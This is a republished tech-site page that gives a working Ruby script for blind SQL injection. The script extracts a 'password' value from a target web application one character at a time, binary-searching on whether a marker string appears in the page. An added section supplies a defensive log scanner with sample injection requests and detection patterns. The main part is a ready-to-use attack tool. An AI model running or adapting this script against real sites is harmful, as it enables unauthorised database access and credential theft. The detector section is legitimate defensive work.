MySQL Brute-Force and Injection Attack Source Code

Date: 2008-07-17 10:53:41   Source: 技术无忧
Keywords: mysql, password, cracking, injection attack

MySQL Brute Force Attack & [Tutorial] Exploit 21: "SQL-Injection 2"
# Author      : Mysqlcracker
# Last Modify : 2007/12/11
require 'net/http'
require 'net/https'

host = 'www.host_url.com'
path = '/exploits_path/index2.php?login=user'
cookie = 'PHPSESSID=***********************'
http = Net::HTTP.new(host, 80)
#http.use_ssl = true
headers = {
  'Cookie' => cookie,
#  'Referer' => 'http://profil.wp.pl/login.html',
#  'Content-Type' => 'application/x-www-form-urlencoded'
}
cmd = 'password'             # SQL expression whose value is recovered
appear_str = 'Steven Baker'  # text that appears in the page only when the injected condition is true
len = 0                      # set to a known length (> 0) to skip Step 1

if len > 0
  print 'len = ' + len.to_s
else
  len = 1
  print 'len = 1'
  # Step 1. Determine the length of the returned value
  loop do
    # Net::HTTP#get returns only the response object on Ruby 1.9+, so read the body from it
    data = http.get(path + '\'%20and%20length(' + cmd + ')>=' + (len + 1).to_s + '--\'', headers).body
    break if !data.index(appear_str)
    print 8.chr * len.to_s.length  # backspace over the previously printed length
    len = len + 1
    print len.to_s
  end
end

puts ''
i = 1
print 'str = '
# Step 2. Recover the string, one character at a time
while i <= len
  print 80.chr
  data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=80--\'', headers).body
  if data.index(appear_str)
    min = 80
    max = 127
  else
    min = 32
    max = 79
  end
  # Binary search over the remaining printable ASCII range
  while min != max
    mid = ((min + max + 1) / 2).to_i
    print 8.chr
    print mid.chr
    str = '  [' + min.to_s + ' ' + mid.to_s + ' ' + max.to_s + ']'
    print str
    data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=' + mid.to_s + '--\'', headers).body
    if data.index(appear_str)
      min = mid
    else
      max = mid - 1
    end
    if min > max
      puts 'error: min > max'
      exit(0)
    end
    # Erase the "[min mid max]" progress text before the next probe
    print 8.chr * str.length + ' ' * str.length + 8.chr * str.length
  end
  print 8.chr + min.chr
  i = i + 1
end
puts "\r\n\r\n" + 'sql brute force search done!!'
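
A defender's view of the script above, as an added example that is not part of the original page: every character costs the script several requests that differ only in the `>=N` threshold, so one client probing the same expression with many distinct thresholds stands out in an access log. The log lines, the combined log format, and the names `find_blind_sqli`, `LINE`, `PROBE` and `SAMPLE_LOG` are assumptions constructed for illustration.

```ruby
require 'uri'

# Constructed sample access log (combined log format, documentation IP addresses).
# Thresholds 80, 104, 92 mirror the first binary-search steps of the script above.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [11/Dec/2007:10:00:01 +0000] "GET /exploits_path/index2.php?login=user'%20and%20length(password)>=2--' HTTP/1.1" 200 5120
  203.0.113.7 - - [11/Dec/2007:10:00:02 +0000] "GET /exploits_path/index2.php?login=user'%20and%20ascii(mid(password,1,1))>=80--' HTTP/1.1" 200 5120
  203.0.113.7 - - [11/Dec/2007:10:00:02 +0000] "GET /exploits_path/index2.php?login=user'%20and%20ascii(mid(password,1,1))>=104--' HTTP/1.1" 200 4210
  203.0.113.7 - - [11/Dec/2007:10:00:03 +0000] "GET /exploits_path/index2.php?login=user'%20and%20ascii(mid(password,1,1))>=92--' HTTP/1.1" 200 5120
  198.51.100.4 - - [11/Dec/2007:10:00:04 +0000] "GET /exploits_path/index2.php?login=alice HTTP/1.1" 200 5120
LOG

# Client address and request target of one combined-log line.
LINE = /\A(?<ip>\S+) .*?"[A-Z]+ (?<target>.+?) HTTP\/[\d.]+"/
# ' and length(x)>=N   or   ' and ascii(mid(x,pos,1))>=N   (simple, non-nested x only)
PROBE = /'\s*and\s+(?<expr>length\([^)]*\)|ascii\(mid\([^)]*\)\))\s*>=\s*(?<n>\d+)/i

# Returns one finding per (client, path, probed expression) that was compared
# against at least min_thresholds distinct values: the trace of a binary search.
def find_blind_sqli(log, min_thresholds: 3)
  probes = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    m = LINE.match(line) or next
    target = begin
      URI.decode_www_form_component(m[:target]) # so %20 and raw spaces match alike
    rescue ArgumentError
      m[:target] # malformed %-escape: fall back to the raw text
    end
    hit = PROBE.match(target) or next
    path = target.split('?', 2).first
    probes[[m[:ip], path, hit[:expr].downcase.delete(' ')]] << hit[:n].to_i
  end
  probes.select { |_, ns| ns.uniq.size >= min_thresholds }
        .map { |(ip, path, expr), ns| { ip: ip, path: path, expr: expr, thresholds: ns.uniq.sort } }
end

puts find_blind_sqli(SAMPLE_LOG).inspect if __FILE__ == $PROGRAM_NAME
```

The single `length(password)` probe in the sample stays below the threshold count; on real traffic the length loop and each character position accumulate their own series.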
